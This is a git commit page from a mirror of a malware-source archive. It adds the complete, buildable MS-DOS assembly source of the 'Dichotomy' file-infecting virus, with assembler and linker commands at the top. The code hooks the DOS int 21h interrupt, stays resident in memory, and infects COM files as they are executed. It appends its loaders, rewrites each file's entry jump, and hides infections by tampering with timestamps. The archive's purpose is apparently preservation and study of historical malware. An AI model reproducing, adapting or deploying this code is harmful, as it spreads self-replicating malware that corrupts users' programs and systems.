daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 07:49:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:41:47 -06:00
committed by GitHub
parent 06c1f4dfdd
commit dc888afe59
99 changed files with 42193 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.dichotom.asm
+339
View File
@@ -0,0 +1,339 @@
; Dichotomy Virus
; (c) 1994 Evil Avatar
;
; TASM /M3 DIKOTOMY
; TLINK /X DIKOTOMY
; EXE2BIN DIKOTOMY DIKOTOMY.COM
.model tiny
.code
org 0
;=====( Entry point for COM files )========================================
Dichotomy:
call delta
delta: mov bx, sp
mov bp, word ptr ds:[bx]
sub bp, offset delta ;get delta offset
inc sp
inc sp
cmp word ptr ds:[bp+virus1], 'D['
mov ah, 1ah
lea dx, [bp+newDTA] ;buffer for new DTA
int 21h ;set new disk transfer address
mov ah, 4eh
mov cx, 7 ;any attribute
lea dx, [bp+FileName] ;host name
int 21h ;find second host file
jc maybe_host ;if carry, then we need a new host
mov ax, 3d00h
int 21h ;open second host
xchg ax, bx ;handle is better in bx
mov ax, 4200h
sub cx, cx
mov dx, word ptr ds:[bp+newDTA+1ah]
sub dx, (offset heap-offset loader2)
int 21h ;move pointer to virus code
mov ah, 3fh
mov cx, (offset heap-offset loader2)
lea dx, [bp+loader2]
int 21h ;read in second part of virus
mov ah, 3eh
int 21h ;close the file
maybe_host:
mov ah, 51h
int 21h ;check if resident
inc bx ;if resident, PSP should be -1
jz resident ;yes? kewl!
cmp word ptr ds:[bp+virus1], 'D[' ;check if we are fully here
je go_res ;yes? we need to go resident
return: mov ah, 1ah
mov dx, 80h
int 21h ;restore DTA
lea si, [bp+comfix] ;offset of first 3 bytes of file
mov di, 100h ;start of .com file
mov ax, di
push ax
movsw
movsb
retn
resident: cmp word ptr ds:[bp+virus1], 'D[' ;is the second host here?
je return ;yes? return to program
mov ah, 62h
int 21h ;request new host
jmp return ;return to host
go_res: jmp loader2 ;go memory resident
;=====( Variables )========================================================
comfix db 0cdh, 20h, 0 ;first 3 bytes of .com file
virus db '[Dichotomy]', 0 ;virus name
author db '(c) 1994 Evil Avatar', 0 ;me
FileName db 'DIKOTOMY.COM', 0, 73h dup (?) ;second host name
loader1_end:
;=====( Go memory resident )===============================================
loader2:
mov byte ptr ds:[bp+count], 0 ;infections = 0
mov ah, 'E'
xor ah, 0fh
mov bx, -1
int 21h ;get available memory
mov ah, 'A'
xor ah, 0bh
sub bx, (virus_end-Dichotomy+15)/16+1
int 21h ;create a hole in memory
mov ax, 3521h
int 21h ;get int 21h handler
mov word ptr [bp+save21], bx
mov word ptr [bp+save21+2], es ;save int 21h vector
mov ah, 'E'
xor ah, 0dh
mov bx, (virus_end-Dichotomy+15)/16
int 21h ;allocate the memory
mov es, ax ;es is high virus segment
mov cx, (virus_end-Dichotomy+1)/2
lea si, [bp+Dichotomy]
sub di, di
rep movsw ;copy ourself up there
push es
pop ds ;save virus seg for int 21h change
dec ax ;MCB segment
mov es, ax
mov word ptr es:[1], 8 ;make DOS the owner of our segment
mov ax, 4541h
sub ax, 2020h
lea dx, [int21]
int 21h ;set new int 21h handler
push cs cs
pop ds es ;restore PSP segments
jmp return ;return to host
;=====( Find a new host )==================================================
request: push ds di si cx cs
pop ds ;save registers
mov di, bp ;set up scan registers
sub si, si
mov cx, 5
repe cmpsw ;scan to see if it is us
jne restore1 ;no? let dos take care of it
mov ax, 4300h
lea dx, [WhatRun]
int 21h ;get attributes of file
push cx ;save them
mov ax, 4301h
sub cx, cx
int 21h ;clear attributes
mov ax, 3d02h
int 21h ;open file read/write
xchg ax, bx
mov ax, 5700h
int 21h ;get file date/time
and cx, 1fh ;get seconds
cmp cx, 1fh ;is it 62?
je cant_fix ;can't fix this file
mov ax, 4202h
sub cx, cx
cwd
int 21h ;go to end of file
mov ah, 40h
mov cx, (heap-loader2)
lea dx, [loader2]
int 21h ;copy to end of file
mov ax, 5700h
int 21h ;get file date/time
or cx, 1fh
mov ax, 5701h
int 21h
cant_fix: mov ax, 4301h
pop cx ;get attributes
int 21h ;restore attributes
mov ah, 3eh
int 21h ;close file
restore1: pop cx si di ds ;restore registers
jmp dos21 ;go to dos
;=====( Interrupt 21h handler )============================================
int21: inc ah
cmp ah, 4ch ;execute file
je infect ;infect it
dec ah
cmp ah, 51h ;install check
je install_check
cmp ah, 62h ;request for new host
je _request
dos21: jmp dword ptr cs:[save21] ;call dos
_request: jmp request
;=====( Installation check )===============================================
install_check:
push di si cx ds cs
pop ds ;save registers
mov di, bp ;set up scan registers
sub si, si
mov cx, 5
repe cmpsw ;scan to see if it is us
jne restore ;no? let dos take care of it
mov bx, -1 ;return code
pop ds ;restore ds
add sp, 6 ;fix stack
iret ;return
restore: pop cx si di ds ;restore registers
jmp dos21 ;go to dos
;=====( Infection routine )================================================
infect: dec ah
call push_all ;save registers
push cs
pop es ;es equals code segment
mov si, dx
lea di, [WhatRun]
mov cx, 40h
rep movsw ;save filename in buffer
mov si, dx ;ds:si equals file name
lea di, [FileName]
mov ax, 4300h
int 21h ;get attributes of file
push cx ;save them
mov ax, 4301h
sub cx, cx
int 21h ;clear attributes
mov ax, 3d02h
int 21h ;open file read/write
xchg ax, bx ;put handle in bx
mov ax, 5700h
int 21h ;get file time/date
and cx, 1fh ;get seconds
cmp cx, 1eh ;is 60 or 62?
jae already_inf ;then already infected
lodsb ;get drive letter
dec si ;point to filename again
and al, 5fh ;make it uppercase
cmp al, 'C' ;is it C or higher?
jb _single ;no? we must fully infect it
cmp byte ptr cs:[count], 1 ;have we already done loader 2?
jne do_loader2 ;yes? start doing loader 1s
do_loader1:
call inf_loader1
jmp done_inf
do_loader2:
call inf_loader2
jmp done_inf
_single: push si di
mov cx, 40h
rep movsw ;save filename in buffer
pop di si
call inf_loader1
call inf_loader2
mov byte ptr cs:[count], 0
done_inf: mov ah, 3eh
int 21h ;close file
already_inf:
mov ax, 4301h
pop cx ;get attributes
int 21h ;restore attributes
call pop_all ;restore registers
jmp dos21 ;call dos
;=====( Infect file with loader 1 )========================================
inf_loader1:
push si di ds dx cs ;save filename and other stuff
pop ds
mov byte ptr ds:[count], 0 ;do loader 2 from now on
mov ah, 3fh
mov cx, 3
lea dx, [comfix]
int 21h ;read in first 3 bytes
mov ax, 4202h
sub cx, cx
cwd
int 21h ;go to end of file
or dx, dx
jnz bad_file
cmp ax, 65024-(virus_end-Dichotomy) ;see if file is too big
jae bad_file
mov cx, word ptr ds:[comfix]
cmp cx, 'M'+'Z'
jz bad_file ;can't infect .exe's
sub ax, 3 ;calculate jump
mov word ptr ds:[buffer], ax ;set up jump
mov ah, 40h
mov cx, (loader1_end-Dichotomy)
cwd
int 21h ;copy virus to end of file
mov ax, 4200h
sub cx, cx
cwd
int 21h ;go to beginning of file
mov ah, 40h
mov cx, 3
lea dx, [buffer-1]
int 21h ;copy jump to beginning
mov ax, 5700h
int 21h ;get file time/date
mov ax, 5701h
or cx, 1eh
and cx, 0fffeh ;set to 60 seconds
int 21h ;set new file time
bad_file: pop dx ds di si
retn
;=====( Infect file with loader 2 )========================================
inf_loader2:
push ds dx ;save file name
mov cx, 40h
rep movsw ;save filename in buffer
push cs
pop ds ;ds needs to be code segment
mov byte ptr ds:[count], 1 ;do loader 1 from now on
mov ax, 4202h
sub cx, cx
cwd
int 21h ;go to end of file
mov ah, 40h
mov cx, (heap-loader2)
lea dx, [loader2]
int 21h ;copy to end of file
mov ax, 5700h
int 21h ;get file date/time
or cx, 1fh ;set to 62 seconds
mov ax, 5701h
int 21h ;set new file time
pop dx ds ;restore file name
retn ;return to caller
;=====( Push all registers )===============================================
push_all: pop word ptr cs:[p_all] ;save return code
push ax bx cx dx bp si di ds es ;save registers
pushf ;save flags
jmp word ptr cs:[p_all] ;return to caller
;=====( Pop all registers )================================================
pop_all: pop word ptr cs:[p_all] ;save return code
popf ;restore flags
pop es ds di si bp dx cx bx ax ;restore registers
jmp word ptr cs:[p_all] ;return to caller
;=====( More variables )===================================================
virus1 db '[Dichotomy]', 0 ;virus signature
db 0e9h ;jump cs:xxxx
heap:
buffer dw ? ;jump buffer
newDTA db 2bh dup (?) ;replacement disk transfer address
save21 dd ? ;interrupt 21h vector
p_all dw ? ;push/pop return value
count db ? ;infection count
WhatRun db 80h dup (?)
virus_end:
end Dichotomy